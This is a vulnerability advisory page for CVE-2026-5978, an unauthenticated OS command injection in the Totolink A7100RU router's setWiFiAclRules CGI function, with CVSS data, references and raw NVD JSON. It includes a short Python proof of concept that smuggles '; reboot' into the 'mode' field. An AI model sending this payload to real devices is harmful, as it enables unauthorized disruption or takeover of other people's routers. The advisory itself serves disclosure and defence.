CVE-2026-5978

Description

A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected is the function setWiFiAclRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument mode leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Totolink A7100RU 7.4cu.2313_b20191024

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL
target = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi"

# Vulnerable payload: OS command injection
# Example: Rebooting the router or creating a test file
payload = "; reboot"

headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0"
}

# Data structure based on the setWiFiAclRules function
data = {
    "function": "setWiFiAclRules",
    "mode": payload,
    "index": "0"
}

try:
    response = requests.post(target, json=data, headers=headers, timeout=5)
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check device status.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5978
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5978
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5978/
[4] VulDB https://vuldb.com/cve/CVE-2026-5978
[5] https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_164/README.md
[6] https://vuldb.com/submit/791825
[7] https://vuldb.com/vuln/356532
[8] https://vuldb.com/vuln/356532/cti
[9] https://www.totolink.net/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5978", "sourceIdentifier": "[email protected]", "published": "2026-04-09T21:16:13.727", "lastModified": "2026-04-27T19:05:57.310", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected is the function setWiFiAclRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument mode leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "baseScore": 10.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}, {"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_164/README.md", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/791825", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/356532", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/356532/cti", "source": "[email protected]"}, {"url": "https://www.totolink.net/", "source": "[email protected]"}]}}